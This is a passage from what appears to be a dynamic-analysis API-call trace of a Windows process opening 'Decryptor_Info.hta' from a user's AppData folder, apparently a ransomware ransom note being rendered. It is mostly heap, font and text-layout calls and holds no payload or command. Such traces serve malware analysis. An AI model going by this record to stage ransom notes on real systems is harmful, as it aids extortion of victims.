hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.176] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.176] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.176] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.176] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.176] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x491150 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x491150 | out: hHeap=0x450000) returned 1 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.176] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.178] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.178] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.178] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.178] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.178] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.178] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.178] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.178] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.178] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.178] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.179] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.179] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.179] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.179] IsCharSpaceW (wch=0x75) returned 0 [0113.179] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0113.179] IsCharSpaceW (wch=0x28) returned 0 [0113.179] IsCharSpaceW (wch=0x23) returned 0 [0113.179] IsCharSpaceW (wch=0x23) returned 0 [0113.179] IsCharSpaceW (wch=0x64) returned 0 [0113.179] IsCharSpaceW (wch=0x65) returned 0 [0113.179] IsCharSpaceW (wch=0x66) returned 0 [0113.179] IsCharSpaceW (wch=0x61) returned 0 [0113.179] IsCharSpaceW (wch=0x75) returned 0 [0113.179] IsCharSpaceW (wch=0x6c) returned 0 [0113.179] IsCharSpaceW (wch=0x74) returned 0 [0113.179] IsCharSpaceW (wch=0x23) returned 0 [0113.179] IsCharSpaceW (wch=0x41) returned 0 [0113.179] IsCharSpaceW (wch=0x50) returned 0 [0113.179] IsCharSpaceW (wch=0x50) returned 0 [0113.179] IsCharSpaceW (wch=0x4c) returned 0 [0113.179] IsCharSpaceW (wch=0x49) returned 0 [0113.179] IsCharSpaceW (wch=0x43) returned 0 [0113.179] IsCharSpaceW (wch=0x41) returned 0 [0113.179] IsCharSpaceW (wch=0x54) returned 0 [0113.179] IsCharSpaceW (wch=0x49) returned 0 [0113.179] IsCharSpaceW (wch=0x4f) returned 0 [0113.179] IsCharSpaceW (wch=0x4e) returned 0 [0113.180] IsCharSpaceW (wch=0x29) returned 0 [0113.180] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x36) returned 0x48ed50 [0113.180] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4ba118 [0113.180] IsCharSpaceW (wch=0x0) returned 0 [0113.180] StrCmpICW (pszStr1="#default#APPLICATION", pszStr2="#default#APPLICATION") returned 0 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48ed50 | out: hHeap=0x450000) returned 1 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ba118 | out: hHeap=0x450000) returned 1 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.180] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.180] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.180] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.180] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.181] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.181] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.181] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.182] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.182] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.182] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.182] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.182] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.183] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.183] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.183] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.183] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.183] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.183] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.184] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.184] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.184] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.184] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.184] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.184] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490ff0 [0113.184] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ff0 | out: hHeap=0x450000) returned 1 [0113.184] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.184] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c2418 | out: hHeap=0x450000) returned 1 [0113.185] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4ba118 [0113.185] RegisterDragDrop (hwnd=0x201f2, pDropTarget=0x741096cc) returned 0x0 [0113.186] GetCurrentThreadId () returned 0xe9c [0113.186] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22f4a8 | out: ppu=0x22f4a8) returned 0x0 [0113.186] IUnknown:AddRef (This=0x47c5c4) returned 0x5 [0113.186] IUri:GetAbsoluteUri (in: This=0x47c5c4, pbstrAbsoluteUri=0x22f528 | out: pbstrAbsoluteUri=0x22f528*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0x0 [0113.186] IUnknown:Release (This=0x47c5c4) returned 0x4 [0113.186] ShouldShowIntranetWarningSecband () returned 0x0 [0113.192] GetIUriPriv () returned 0x0 [0113.192] IUnknown:Release (This=0x47c5c4) returned 0x4 [0113.192] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f320 | out: lpPoint=0x22f320) returned 1 [0113.192] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x4aad48 [0113.193] GetCurrentThreadId () returned 0xe9c [0113.193] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aad48 | out: hHeap=0x450000) returned 1 [0113.193] GetCurrentThreadId () returned 0xe9c [0113.193] GetCurrentThreadId () returned 0xe9c [0113.193] GetFocus () returned 0x201f2 [0113.193] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f490 | out: lpPoint=0x22f490) returned 1 [0113.193] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f480 | out: lpRect=0x22f480) returned 1 [0113.193] PostMessageW (hWnd=0x201f2, Msg=0x20, wParam=0x1f2, lParam=0x1) returned 1 [0113.193] GetCurrentThreadId () returned 0xe9c [0113.193] GetCurrentThreadId () returned 0xe9c [0113.193] GetCurrentThreadId () returned 0xe9c [0113.193] CoInitialize (pvReserved=0x0) returned 0x1 [0113.193] CoCreateInstance (in: rclsid=0x73d20e58*(Data1=0x275c23e2, Data2=0x3747, Data3=0x11d0, Data4=([0]=0x9f, [1]=0xea, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3f, [6]=0x86, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73d20e48*(Data1=0xdccfc164, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppv=0x74109500 | out: ppv=0x74109500*=0x48edd0) returned 0x0 [0113.574] IUnknown:QueryInterface (in: This=0x48edd0, riid=0x73d21170*(Data1=0x359f3441, Data2=0xbd4a, Data3=0x11d0, Data4=([0]=0xb1, [1]=0x88, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x38, [6]=0xc9, [7]=0x69)), ppvObject=0x74109504 | out: ppvObject=0x74109504*=0x4ac4f0) returned 0x0 [0113.574] IUnknown:QueryInterface (in: This=0x48edd0, riid=0x73d21180*(Data1=0xdccfc162, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppvObject=0x74109508 | out: ppvObject=0x74109508*=0x4aadb8) returned 0x0 [0113.576] CoUninitialize () [0113.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aadf0 [0113.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x64) returned 0x4c5ba0 [0113.578] GetSysColor (nIndex=5) returned 0xffffff [0113.578] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aae28 [0113.578] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xec) returned 0x4c5c10 [0113.578] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.578] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.580] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xdc) returned 0x4c5d08 [0113.580] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x4aae60 [0113.581] LsGetRubyLsimethods () returned 0x0 [0113.581] LsGetTatenakayokoLsimethods () returned 0x0 [0113.581] LsGetHihLsimethods () returned 0x0 [0113.581] LsGetWarichuLsimethods () returned 0x0 [0113.581] LsGetReverseLsimethods () returned 0x0 [0113.581] LsCreateContext () returned 0x0 [0113.581] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x670) returned 0x4c6048 [0113.581] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c0250 [0113.581] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x110) returned 0x4b3190 [0113.581] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c0280 [0113.581] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2e4) returned 0x4c66c0 [0113.581] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4c26e8 [0113.581] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4c2710 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa0) returned 0x4c69b0 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab888 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4c2738 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4c2760 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4c2788 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4c27b0 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x400) returned 0x4c6a58 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7110 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7100 [0113.582] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7140 [0113.583] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7150 [0113.583] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x128) returned 0x4c6e60 [0113.583] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x11c) returned 0x4c6f90 [0113.583] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x108) returned 0x4c70b8 [0113.583] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x130) returned 0x4c71c8 [0113.583] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x110) returned 0x4b32a8 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x278) returned 0x4c7300 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc8) returned 0x4c7580 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x4c7650 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x4623a0 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf0) returned 0x4c77e8 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4c) returned 0x490ff0 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x194) returned 0x4c78e0 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc8) returned 0x4c7a80 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x4c7b50 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x108) returned 0x4c7ce8 [0113.584] LsSetModWidthPairs () returned 0x0 [0113.584] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x240) returned 0x4c7df8 [0113.585] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4c2cb8 [0113.585] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4c27d8 [0113.587] EnumFontFamiliesExW (hdc=0x160101d2, lpLogfont=0x22e430, lpProc=0x73ddbbcd, lParam=0x22e3e8, dwFlags=0x0) returned 0 [0113.588] MulDiv (nNumber=17000, nNumerator=20, nDenominator=1000) returned 340 [0113.588] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aae98 [0113.588] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x64) returned 0x4c8728 [0113.588] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xec) returned 0x4c8798 [0113.588] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.588] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.589] LsSetBreaking () returned 0x0 [0113.589] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x271) returned 0x4c9b18 [0113.589] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa) returned 0x4c8088 [0113.589] LsSetDoc () returned 0x0 [0113.589] LsCreateLine () returned 0x0 [0113.589] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.589] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb4) returned 0x4c9d98 [0113.589] EnumFontsW (hdc=0x160101d2, lpLogfont="Arial", lpProc=0x73d20b47, lParam=0x22e43c) returned 1 [0113.591] CreateFontIndirectW (lplf=0x22e3d8) returned 0xae0a01b1 [0113.591] SelectObject (hdc=0x160101d2, h=0xae0a01b1) returned 0x18a002e [0113.591] GetTextMetricsW (in: hdc=0x160101d2, lptm=0x22e340 | out: lptm=0x22e340) returned 1 [0113.597] GetOutlineTextMetricsW (in: hdc=0x160101d2, cjCopy=0xd8, potm=0x22e240 | out: potm=0x22e240) returned 0xd8 [0113.597] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0xae0a01b1 [0113.597] SelectObject (hdc=0x160101d2, h=0xae0a01b1) returned 0x18a002e [0113.597] GetTextFaceW (in: hdc=0x160101d2, c=32, lpName=0x22e490 | out: lpName="Arial") returned 6 [0113.597] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0xae0a01b1 [0113.598] SelectObject (hdc=0x160101d2, h=0xae0a01b1) returned 0x18a002e [0113.598] GetTextCharsetInfo (in: hdc=0x160101d2, lpSig=0x22e3f8, dwFlags=0x0 | out: lpSig=0x22e3f8) returned 0 [0113.598] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0xae0a01b1 [0113.598] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xc) returned 0x4c80a0 [0113.598] SelectObject (hdc=0x160101d2, h=0xae0a01b1) returned 0x18a002e [0113.598] GetFontUnicodeRanges (in: hdc=0x160101d2, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0113.598] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.598] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x27c) returned 0x4ca210 [0113.598] GetFontUnicodeRanges (in: hdc=0x160101d2, lpgs=0x4ca210 | out: lpgs=0x4ca210) returned 0x27c [0113.598] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0xae0a01b1 [0113.598] SelectObject (hdc=0x160101d2, h=0xae0a01b1) returned 0x18a002e [0113.598] GetCharWidth32W (in: hdc=0x160101d2, iFirst=0x20, iLast=0x7e, lpBuffer=0x22e3d0 | out: lpBuffer=0x22e3d0) returned 1 [0113.605] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17c) returned 0x4ca498 [0113.605] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x800) returned 0x4ca620 [0113.605] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0xae0a01b1 [0113.606] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb4) returned 0x4cae28 [0113.606] LsQueryLineDup () returned 0x0 [0113.606] LsDestroyLine () returned 0x0 [0113.606] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.607] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c02b0, Size=0x90) returned 0x4cafa8 [0113.607] LsSetDoc () returned 0x0 [0113.607] LsCreateLine () returned 0x0 [0113.607] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.607] CreateFontIndirectW (lplf=0x22e3d8) returned 0x180a09ad [0113.607] SelectObject (hdc=0x160101d2, h=0x180a09ad) returned 0x18a002e [0113.607] GetTextMetricsW (in: hdc=0x160101d2, lptm=0x22e340 | out: lptm=0x22e340) returned 1 [0113.611] GetOutlineTextMetricsW (in: hdc=0x160101d2, cjCopy=0xd8, potm=0x22e240 | out: potm=0x22e240) returned 0xd8 [0113.612] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x180a09ad [0113.612] SelectObject (hdc=0x160101d2, h=0x180a09ad) returned 0x18a002e [0113.612] GetTextFaceW (in: hdc=0x160101d2, c=32, lpName=0x22e490 | out: lpName="Arial") returned 6 [0113.612] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x180a09ad [0113.612] SelectObject (hdc=0x160101d2, h=0x180a09ad) returned 0x18a002e [0113.612] GetTextCharsetInfo (in: hdc=0x160101d2, lpSig=0x22e3f8, dwFlags=0x0 | out: lpSig=0x22e3f8) returned 0 [0113.612] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x180a09ad [0113.612] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xc) returned 0x4c80b8 [0113.612] SelectObject (hdc=0x160101d2, h=0x180a09ad) returned 0x18a002e [0113.612] GetFontUnicodeRanges (in: hdc=0x160101d2, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0113.612] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.612] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x27c) returned 0x4cb3f8 [0113.613] GetFontUnicodeRanges (in: hdc=0x160101d2, lpgs=0x4cb3f8 | out: lpgs=0x4cb3f8) returned 0x27c [0113.613] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x180a09ad [0113.613] SelectObject (hdc=0x160101d2, h=0x180a09ad) returned 0x18a002e [0113.613] GetCharWidth32W (in: hdc=0x160101d2, iFirst=0x20, iLast=0x7e, lpBuffer=0x22e3d0 | out: lpBuffer=0x22e3d0) returned 1 [0113.616] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17c) returned 0x4cb680 [0113.616] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x800) returned 0x4cb808 [0113.616] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x180a09ad [0113.617] SelectObject (hdc=0x160101d2, h=0x180a09ad) returned 0x18a002e [0113.617] GetCharWidthW (in: hdc=0x160101d2, iFirst=0x2052, iLast=0x2052, lpBuffer=0x22e63c | out: lpBuffer=0x22e63c) returned 1 [0113.618] SelectObject (hdc=0x160101d2, h=0x18a002e) returned 0x180a09ad [0113.618] LsQueryLineDup () returned 0x0 [0113.618] LsDestroyLine () returned 0x0 [0113.618] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.618] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab918 [0113.618] LsSetDoc () returned 0x0 [0113.618] LsCreateLine () returned 0x0 [0113.618] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.621] LsQueryLineDup () returned 0x0 [0113.621] LsDestroyLine () returned 0x0 [0113.621] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.621] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab960 [0113.621] LsSetDoc () returned 0x0 [0113.621] LsCreateLine () returned 0x0 [0113.621] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.622] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb4) returned 0x4cc010 [0113.622] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb4) returned 0x4cc190 [0113.622] LsQueryLineDup () returned 0x0 [0113.622] LsDestroyLine () returned 0x0 [0113.622] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.622] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4cafa8, Size=0xd8) returned 0x4cc310 [0113.623] LsSetDoc () returned 0x0 [0113.623] LsCreateLine () returned 0x0 [0113.623] HeapFree (in: 